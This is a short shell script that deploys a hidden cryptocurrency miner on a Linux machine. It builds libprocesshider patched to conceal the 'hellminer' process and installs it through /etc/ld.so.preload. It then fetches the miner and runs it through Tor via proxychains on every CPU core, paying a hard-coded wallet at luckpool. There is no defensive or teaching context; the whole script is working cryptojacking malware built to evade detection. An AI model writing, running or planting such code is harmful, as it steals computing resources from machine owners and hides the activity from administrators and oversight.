#!/bin/sh
sudo apt update
sudo apt install nano tor proxychains git -y
sudo service tor start

git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider
sed -i 's/apache/hellminer/' processhider.c
make
sudo mv libprocesshider.so /usr/local/lib/;sudo su -c 'echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload'
cd ..
sudo rm libprocesshider -r

sed -i 's/socks4/socks5/' /etc/proxychains.conf

wget https://github.com/hellcatz/luckpool/blob/master/miners/hellminer_cpu_ubuntu_18.tar.gz
tar xf hellminer_cpu_ubuntu_18.tar.gz

proxychains ./hellminer -c stratum+tcp://eu.luckpool.net:3956#xnsub -u RKJZtNARyonv8N2GtPAo5E7sn8uHPjt2LZ.$(echo $(shuf -i 1-1000 -n 1)) -p x --cpu $(echo $(nproc --all))
